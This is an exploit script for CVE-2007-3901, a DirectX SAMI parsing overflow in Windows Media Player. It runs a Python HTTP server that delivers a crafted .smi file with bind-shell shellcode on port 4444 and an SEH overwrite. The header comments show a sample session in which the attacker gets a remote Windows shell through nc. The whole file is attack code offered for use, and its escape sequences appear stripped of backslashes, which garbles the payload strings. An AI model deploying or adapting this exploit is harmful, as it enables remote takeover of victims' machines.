#!/usr/bin/python
##########################################################################
# Bug discovered by Jun Mao of VeriSign iDefense 
# http://www.securityfocus.com/bid/26789
# CVE-2007-3901
# Coded by Matteo Memelli aka ryujin
# http://www.gray-world.net http://www.be4mind.com
# Tested on: Windows 2000 SP4 English, DirectX 7.0 (4.07.00.0700) 
#------------------------------------------------------------------------
# THX TO all the guys at www.offensive-security.com
# EXPECIALLY TO ONE: THX FOR "NOT" HELPING MUTS!!! 
# I DONT FEEL FC4'd ANYMORE NOW :P muhahahaha
#------------------------------------------------------------------------
##########################################################################  
# On Windows Media Player Open---> http://attacker/anyfile.smi
# .smi extension is necessary, filename can be anything.
#  
# badrobot:/home/matte# ./mplayer.py 
# [+] Listening on port 80
# [+] Connection accepted from: 192.168.1.243
# [+] Payload sent, check your shell on 192.168.1.243 port 4444
# badrobot:/home/matte# nc 192.168.1.243 4444
# Microsoft Windows 2000 [Version 5.00.2195]
# (C) Copyright 1985-2000 Microsoft Corp.
#
# C:Documents and SettingsryujinDesktop>ipconfig
# ipconfig
#
# Windows 2000 IP Configuration
#
# Ethernet adapter Local Area Connection:
#
#        Connection-specific DNS Suffix  . : 
#        IP Address. . . . . . . . . . . . : 192.168.1.243
#        Subnet Mask . . . . . . . . . . . : 255.255.255.0
#        Default Gateway . . . . . . . . . : 
#
# C:Documents and SettingsryujinDesktop>
##########################################################################
 
from socket import *

# SMI BODY
body = """<SAMI>
<HEAD>
<STYLE TYPE="text/css">
<!--
P {
font-size: 1em;
font-family: Arial;
font-weight: normal;
color: #FFFFFF;
background: #000000;
text-align: center;
padding-left: 5px;
padding-right: 5px;
padding-bottom: 2px;
}
.ENUSCC { Name: English; lang: EN-US-CC; }
-->
</STYLE>
</HEAD>
<BODY>
<SYNC Start="0" pippo=""""

# Metasploit bind shell on port 4444 EXITFUNC seh
shellcode = (
"xfcx6axebx4dxe8xf9xffxffxffx60x8bx6cx24x24x8bx45"
"x3cx8bx7cx05x78x01xefx8bx4fx18x8bx5fx20x01xebx49"
"x8bx34x8bx01xeex31xc0x99xacx84xc0x74x07xc1xcax0d"
"x01xc2xebxf4x3bx54x24x28x75xe5x8bx5fx24x01xebx66"
"x8bx0cx4bx8bx5fx1cx01xebx03x2cx8bx89x6cx24x1cx61"
"xc3x31xdbx64x8bx43x30x8bx40x0cx8bx70x1cxadx8bx40"
"x08x5ex68x8ex4ex0execx50xffxd6x66x53x66x68x33x32"
"x68x77x73x32x5fx54xffxd0x68xcbxedxfcx3bx50xffxd6"
"x5fx89xe5x66x81xedx08x02x55x6ax02xffxd0x68xd9x09"
"xf5xadx57xffxd6x53x53x53x53x53x43x53x43x53xffxd0"
"x66x68x11x5cx66x53x89xe1x95x68xa4x1ax70xc7x57xff"
"xd6x6ax10x51x55xffxd0x68xa4xadx2exe9x57xffxd6x53"
"x55xffxd0x68xe5x49x86x49x57xffxd6x50x54x54x55xff"
"xd0x93x68xe7x79xc6x79x57xffxd6x55xffxd0x66x6ax64"
"x66x68x63x6dx89xe5x6ax50x59x29xccx89xe7x6ax44x89"
"xe2x31xc0xf3xaaxfex42x2dxfex42x2cx93x8dx7ax38xab"
"xabxabx68x72xfexb3x16xffx75x44xffxd6x5bx57x52x51"
"x51x51x6ax01x51x51x55x51xffxd0x68xadxd9x05xcex53"
"xffxd6x6axffxffx37xffxd0x8bx57xfcx83xc4x64xffxd6"
"x52xffxd0x68xf0x8ax04x5fx53xffxd6xffxd0"
)

body += 21988*'A'                                 
body += 'x90'*16                                 # NOP Slide
body += shellcode + 'C'*67                        # to SEH... 
body += 'xebx06x90x90x2bx1exe1x77'        # ShortJmp, and SEH overwrite
body += 'x90'*4 + 'xE9x6BxFExFFxFFx90x90' # NearJmp, back to shellcode
body += 143505*'E' + '">'
body += '<P Class="ENUSCC">NICE MOVIE!</P></SYNC></BODY></SAMI>'

# RESPONSE HEADER 
header = (
'HTTP/1.1 200 OKrn'
'Content-Type: application/smilrn'
'rn'
)

evilbuf = header + body
s = socket(AF_INET, SOCK_STREAM)
s.bind(("0.0.0.0", 80))
s.listen(1)
print "[+] Listening on port 80"
c, addr = s.accept()
print "[+] Connection accepted from: %s" % (addr[0])
c.recv(1024)
c.send(evilbuf)
print "[+] Payload sent, check your shell on %s port 4444" % addr[0]
c.close()
s.close()

# www.Syue.com [2008-01-08]